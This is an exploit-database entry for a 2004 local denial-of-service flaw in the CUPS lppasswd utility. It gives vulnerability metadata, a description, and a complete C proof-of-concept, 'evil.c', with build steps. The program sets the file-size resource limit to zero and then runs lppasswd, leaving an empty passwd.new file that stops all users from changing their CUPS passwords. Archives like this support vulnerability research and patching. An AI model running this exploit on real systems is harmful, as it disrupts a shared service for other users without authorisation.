header-logo
Suggest Exploit
vendor:
lppasswd
by:
Bartlomiej Sieka
5.5
CVSS
MEDIUM
Denial of Service
CWE
Product Name: lppasswd
Affected Version From: 1.1.19
Affected Version To: 1.1.22
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: FreeBSD 5.2
2004

Easy Software Products lppasswd Denial of Service Vulnerability

The Easy Software Products lppasswd utility is prone to a locally exploitable denial-of-service vulnerability. The issue occurs when the program attempts to write a file to the system that will exceed any file size resource limits in place. An unprivileged user with CUPS credentials can set these resource limits and then invoke the application, which will create an empty '/usr/local/etc/cups/passwd.new' file. Subsequent invocations of lppasswd will fail if this file is present. Successful exploitation of this vulnerability will prevent users from changing their CUPS passwords with lppasswd.

Mitigation:

There is no known mitigation for this vulnerability. It is recommended to update to a patched version of the software.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/12005/info

Easy Software Products lppasswd is prone to a locally exploitable denial of service vulnerability. This issue occurs when the program attempts to write a file to the system that will exceed any file size resource limits in place. This presents a vulnerability since an unprivileged user with CUPS credentials may set these resource limits and then invoke the application. This will create an empty '/usr/local/etc/cups/passwd.new' file. If this file is present, then future invocations of lppasswd will fail.

Successful exploitation will prevent users from changing their CUPS passwords with lppasswd. 

/*
 * evil.c
 * 2004.12.11
 * Bartlomiej Sieka
 *
 * This program executes the lpasswd(1) password changing utility
 * in way that prevents its further use, i.e. after this program
 * has been executed, all users on the system will be unable to change
 * their CUPS passwords. This is not a documented feature of lppasswd(1)
 * and is certainly unauthorized.
 *
 * This program has been tested with lppasswd(1) versions 1.1.19 and
 * 1.1.22 on FreeBSD 5.2.
 *
 * The recipe:
 * gcc -o evil evil.c
 * ./evil
 * Type in passwords as requested, and voila! This will create an empty
 * file /usr/local/etc/cups/passwd.new. The existence of this file makes
 * lppasswd(1) quit before changing users password with message
 * "lppasswd: Password file busy!".
 */

#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
extern char **environ;

int main(int argc, char **argv){

  char *cmd = "/usr/local/bin/lppasswd";
  char *args[] = { "/usr/local/bin/lppasswd", 0x00 };

  /* set the file size limit to 0 */
  struct rlimit rl;
  rl.rlim_cur = 0;
  rl.rlim_max = 0;
  setrlimit(RLIMIT_FSIZE, &rl);

  /* execute the poor victim */
  execve(cmd, args, environ);
}